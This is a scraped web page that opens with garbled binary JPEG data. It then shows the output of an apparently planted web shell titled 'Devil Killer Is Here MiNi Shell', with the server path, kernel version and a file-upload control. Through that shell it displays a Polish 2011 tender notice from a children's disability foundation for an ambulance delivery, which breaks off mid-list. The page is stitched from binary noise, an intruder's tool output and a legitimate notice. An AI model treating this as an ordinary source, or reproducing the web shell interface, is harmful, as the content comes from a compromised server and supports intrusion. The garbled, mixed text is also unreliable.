JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111114/377632-N-2011.html

<p class="kh_header"><b>Miechucino: dostawa 1 sztuki ambulansu transportowego</b><br>
<b>Numer ogłoszenia: 377632 - 2011; data zamieszczenia: 14.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Fundacja Pomocy Dzieciom Niepełnosprawnym UŚMIECH DZIECKA , ul. Szklana 44, 83-334 Miechucino, woj. pomorskie, tel. 058 6847766, faks 058 6847766.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.usmiechdziecka.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: fundacja - organizacja pożytku publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa 1 sztuki ambulansu transportowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wymagane parametry
Wymagania na samochód bazowy i przedział medyczny

1. NADWOZIE
-	typ furgon , częściowo przeszklony z izolacją dźwiękowo-termiczną
-	przystosowany do przewozu jednego pacjenta w pozycji leżącej
-	umożliwiający przewożenie min. 3 osób wraz z kierowcą oraz 1 osoby na noszach
-	poduszka powietrzna z systemem kontroli ciśnienia dla kierowcy i pasażera
-	drzwi tylne przeszklone dwuskrzydłowe, obejmujące całą ścianę tylną otwierane o min. 1800 , wyposażone w ograniczniki oraz blokadę położenia skrzydeł  Szyby pokryte w 2/3 wysokości folią półprzezroczystą, ogrzewane z wycieraczką. 
-	drzwi boczne prawe przesuwne do tyłu przeszklone umożliwiające łatwe wejście do przedziału Medycznego
-	drzwi boczne lewe przesuwne usytuowane za kierowcą, za którymi znajduje się schowek na: butlę tlenową, trójkąt ostrzegawczy 
-	centralny zamek wszystkich drzwi z autoalarmem
-	imobilizer lub inny system zabezpieczenia przed kradzieżą 
-	elektrycznie sterowane szyby w kabinie kierowcy
-	światła przeciwmgielne
-	wizualny lub dźwiękowy sygnał informujący o niezapiętych pasach kierowcy i otwartych drzwiach
-	zewnętrzne lusterka boczne o powiększonym polu widzenia z elektryczną regulacją
-	kolor nadwozia biały 
-	zderzaki oraz obudowy lusterek w kolorze nadwozia
-	system wspomagania parkowania tyłem
-	fabryczny radioodtwarzacz CD/MP3
-	nawigacja satelitarna wbudowana fabrycznie w deskę rozdzielczą z ekranem kolorowym obejmującym również funkcje radioodtwarzacza sterowana pilotem

	2. SILNIK
-	zasilany olejem napędowym , z zapłonem samoczynnym , turbodoładowany
-	silnik  o mocy  min 78kW
-	przeciwpożarowy system odcięcia dopływu paliwa w przypadku zderzenia

	3. ZESPÓŁ NAPĘDOWY I ZAWIESZENIE
-	zawieszenie gwarantujące dobrą przyczepność kół do nawierzchni , stabilność i manewrowość w trudnym terenie, pozwalające na komfortowy przewóz pacjentów z rozstawem osi minimum 3000 mm
-	napęd na koła przednie lub 4 x 4
-	min 5 stopniowa skrzynia biegów

	4. UKŁAD HAMULCOWY
-	ze wspomaganiem nagłego hamowania zgodnie wymogami normy PN EN 1789+A1:2011  
-	układ zapobiegający blokowaniu kół podczas hamowania  ABS
-	hamulec ręczny
-	tarczowe hamulce obu osi (nie dopuszcza się hamulców bębnowych)

	5. UKŁAD KIEROWNICZY
-	ze wspomaganiem
-	kierownica z regulacją w min. jednej płaszczyźnie
-	fotel kierowcy z regulacją wysokości

	6. OGRZEWANIE I WENTYLACJA
-	dodatkowa nagrzewnica w przedziale medycznym wyposażona w zawór odcinający zintegrowana z układem chłodzenia 
-	mechaniczna wentylacja nawiewno- wywiewna zapewniająca min. 20-krotną wymianę powietrza na godzinę (podać wydajność w m3/godzinę)
-	klimatyzacja  z filtrem przeciwpyłowym (dotyczy kabiny kierowcy)
-	ogrzewanie postojowe przedziału medycznego- grzejnik elektryczny z sieci 230V z możliwością ustawienia temperatury i termostatem o mocy zapewniającej uzyskanie właściwej temperatury w przedziale medycznym (podać  markę i model oraz moc oferowanego urządzenia)

	7. INSTALACJA ELEKTRYCZNA I OŚWIETLENIE 
-	min 4  lampy jarzeniowe rozmieszczone po obu stronach przedziału medycznego
-	min 1 lampa typu halogenowego zamocowana w przedniej części przedziału medycznego
-	min. 2 gniazda 12V zabezpieczone przed zabrudzeniem wraz z wtykiem do podłączenia urządzenia medycznego
-	reflektory w drzwiach tylnych oświetlające przedpole z tyłu pojazdu przy otwarciu skrzydeł o 1800 
-	min. 2 gniazda 230 V w przedziale medycznym z bezpiecznikami zabezpieczającymi

	8. OZNAKOWANIE POJAZDU
-	pas odblaskowy barwy niebieskiej dookoła pojazdu na wysokości linii podziału , pas fluorescencyjny barwy żółtej wokół dachu oraz poniżej pasa niebieskiego
-	standardowe oznaczenie karetki na bokach i drzwiach tylnych
-	oznakowanie pojazdu zgodne z przepisami Ustawy  Prawo o Ruchu Drogowym
-	logo Zamawiającego oraz Sponsorów

	9.SYGNALIZACJA ŚWIETLA I DŹWIĘKOWA
-	belka świetlna typu wyładowczego ze światłem koloru niebieskiego  zamontowana w przedniej części dachu pojazdu z możliwością podawania komunikatów głosem
-	2 niebieskie lampy pulsacyjne zamontowane na wysokości pasa przedniego oraz na błotnikach przednich

	10. ŁĄCZNOŚĆ RADIOWA
-	antena radiotelefonu  zamontowana na dachu pojazdu
-	instalacja podłączeniowa do montażu radiotelefonu

	11. PRZEDZIAŁ MEDYCZNY
-	długość przedziału medycznego min 2100mm
-	podłoga o powierzchni przeciwpoślizgowej łatwo zmywalnej połączonej szczelnie z zabudową ścian z podstawą pod nosze ze schowkiem na deskę ortopedyczną
-	ściany boczne i sufity pokryte płytami z tworzywa sztucznego , łatwo zmywalne przystosowane do dezynfekcji
-	kabina kierowcy  oddzielona od przedziału medycznego przegrodą pełną z oknem umożliwiającym komunikację z kierowcą 
-	miejsce mocowania sprzętu medycznego
-	wszystkie urządzenia medyczne oraz elementy zabudowy zabezpieczone przed przemieszczeniem w czasie jazdy
-	na prawej ścianie pojazdu  min.  1 miejsce    (fotel ) wyposażone w trzypunktowe  pasy bezpieczeństwa
-	na lewej ścianie zespół szafek i półek 
-	uchwyt do kroplówki umieszczony w suficie
 
	12. INSTALACJA TLENOWA
-	instalacja tlenowa wyposażona w butlę tlenową o poj.  min 10L wyposażona w reduktor butlowy.
-	konstrukcja reduktora umożliwia montaż i demontaż reduktora bez konieczności użycia kluczy

	13. NOSZE TRANSPORTOWE (podać markę i model )
-	wyposażone  w  min. 2 kółka skrętne o 360 stopni  z blokadą kierunku i obrotu 
-	nosze powinny posiadać min. 5 stopniową regulację oparcia pod plecami do kąta min 750 
-	składane poręcze boczne 
-	rama noszy wykonana z  materiału odpornego na korozje i na działanie płynów dezynfekujących
-	wyposażone w materac o konstrukcji zapobiegającej wchłanianiu płynów , łatwy do czyszczenia , zmywania , odporny na olej napędowy oraz środki dezynfekujące
-	wyposażone w system pasów szelkowych i poprzecznych  zabezpieczających pacjenta  o regulowanej długości mocowane do ramy noszy 
-	waga kpl. noszy max 34 kg (podać)
-	średnica kół min. 20 cm
-	długość całkowita  min.195 cm (podać)
-	dopuszczalne obciążenie min 160 kg (podać)
-	dołączyć do oferty folder potwierdzający oferowane parametry
-	system mocowania zestawu transportowego do podstawy lub podłogi zgodny z PN EN 1789 punkt 4.5.9 i punkt 5.3 
-	Deklaracja Zgodności CE

	14. KRZESŁO TRANSPORTOWE SKŁADANE (podać markę i model )
-	wykonane z  materiału odpornego na korozje i na działanie płynów dezynfekujących
-	wyposażone w min 4  kółka transportowe w tym, co najmniej dwa z blokadą obrotu
-	wyposażone w teleskopowo wydłużane przednie  rączki transportowe z regulacją długości ustawiane na min 2 poziomach
-	wyposażone w min. dwie pary składanych tylnych rączek transportowych
-	wyposażone w blokadę zabezpieczającą przed złożeniem w trakcie transportu 
-	siedzisko wykonane z mocnego materiału , odpornego na bakterie , grzyby , zmywalnego , dezynfekowalnego , odpornego na wodę , oraz na olej napędowy
-           wyposażone w min. 2 pasy zabezpieczające
-	umożliwiające szybkie ich rozpięcie
-	waga max. 10 kg
-	dopuszczalne obciążenie min 150 kg
-	Deklaracja Zgodności z PN EN  1865 (załączyć)

	15 WYMAGANIA DODATKOWE
-	Gwarancja na przedmiot oferty (ambulans łącznie ze sprzętem) min 24 miesiące
-	Deklaracje Zgodności na sprzęt medyczny (załączyć ).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.11.41.00-0, 50.11.71.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta winna być zabezpieczona wadium w  wysokości : 2 000 PLN
2.	Przy wnoszeniu wadium Wykonawca winien podać  numer i nazwę postępowania.
3.	Termin wnoszenia wadium upływa wraz z upływem terminu składania ofert tj. dnia 21.11.2011
do godz. 12:00 - (decyduje termin uznania rachunku bankowego Zamawiającego).
4.	Wadium może być wnoszone :
w pieniądzu, przelewem na konto Fundacji Pomocy Dzieciom Niepełnosprawnym Uśmiech Dziecka Szklana 44;83-334 Miechucino
Nr 95 8324 0001 0000 1368 2000 0010
a)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
b)	gwarancjach bankowych, 
c)	w gwarancjach ubezpieczeniowych,
d)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109 poz. 1158, z późn. zmianami).
5.	Wadium wnoszone w formie: poręczenia bankowego, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach, 
o których mowa w pkt 4 lit e) należy złożyć w formie oryginału w oddzielnej (nie tej samej w której jest oferta) , opisanej zgodnie z pkt. X.11. siwz kopercie, w terminie do 21.11.2011r. do godz. 12:00, w siedzibie Fundacji Pomocy Dzieciom Niepełnosprawnym Uśmiech Dziecka ; Szklana 44,  83-334 Miechucino .
6.	Z treści gwarancji (poręczenia) musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja (Poręczenie) musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta (Poręczyciela). Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska).
7.	Gwarancja (Poręczenie) musi określać kwotę wadium oraz termin ważności gwarancji (poręczenia) oraz winno z niej wynikać, że Gwarant ( Poręczyciel) działając na zlecenie Wykonawcy gwarantuje nieodwołalnie i bezwarunkowo zapłatę kwoty wadium zgodnie z warunkami przystąpienia do postępowania zapisanymi w SIWZ,  do której zwrotu Wykonawca traci prawo w przypadku nw okoliczności:
a)	Wykonawca odmówił  podpisania umowy na warunkach określonych w ofercie,
b)	Wykonawca na wezwanie Zamawiającego wynikające z przyczyn leżących po stronie Wykonawcy,  nie uzupełnił oświadczeń lub dokumentów i pełnomocnictw, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych, niezbędnych do przeprowadzenia postępowania, chyba że udowodni, że wynika to z przyczyn nie leżących po stronie Wykonawcy,
c)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8.	Wykonawca, który nie wniesie wadium w wymaganej wysokości lub formie podlega wykluczeniu 
z postępowania o udzielenie zamówienia publicznego.
9.	Zwrot wadium nastąpi niezwłocznie : 
a)	po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt.10
b)	na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert,
c)	po podpisaniu umowy z Wykonawcą, którego oferta została wybrana,
d)	jeżeli upłynął termin związania ofertą,
e)	jeżeli Zamawiający unieważnił postępowanie o udzielenie zamówienia.
10.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi 
z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, 
o którym mowa w art. 26 ust. 3 ustawy nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
12.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w  ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
13.	W ofercie należy dokładnie określić sposób zwrotu przez Zamawiającego wniesionego  wadium 
(tj. adres banku, numer konta).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunków w w/w zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli w złożonych dokumentach i oświadczeniach Dostawca dołączy wykaz wykonanych dostaw ambulansów z zabudową medyczną typu /A1/ - /min. 2 dostawy o wartości min. 150 000 zł brutto każda/ w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem przedmiotu, jego wartości, dat wykonania i odbiorców, wg wzoru zamieszczonego w poniższej tabeli nr 1.

TABELA NR 1 -  DOSTAWY  ZREALIZOWANE
Lp.	PRZEDMIOT DOSTAWY	WARTOŚĆ  DOSTAWY	DATA
WYKONANIA	ODBIORCA
1.				
			

Do wykazu należy dołączyć min. 2 dokumenty potwierdzające, że dostawy wymienione w tabeli nr 1 zostały wykonane należycie.

Jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca w takiej sytuacji zobowiązany jest złożyć pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (art.26 ust.2b ustawy). Wzór zobowiązania stanowi załącznik nr 4 do siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunków w w/w zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie precyzuje warunków w w/w zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli w złożonych dokumentach i oświadczeniach Dostawca jednoznacznie wykaże:
1) informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę min. 300 000 zł. wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. , 

2) jeżeli Wykonawca polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, wymaga się przedłożenia informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których te podmioty posiadają rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową podmiotu, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, łączna wartość środków nie może być mniejsza niż :  300 000 zł, (§1 ust.3 Rozporządzenia Prezesa Rady Ministrów z dnia 30.12.2009 r. Dz.U. z 2009 r. nr 226,poz 1817),
3) opłaconą polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Suma gwarancyjna na jedno zdarzenie nie może być mniejsza niż : 300 000 zł, 
4) jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego  
warunku. (art.26 ust.2c ustawy).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
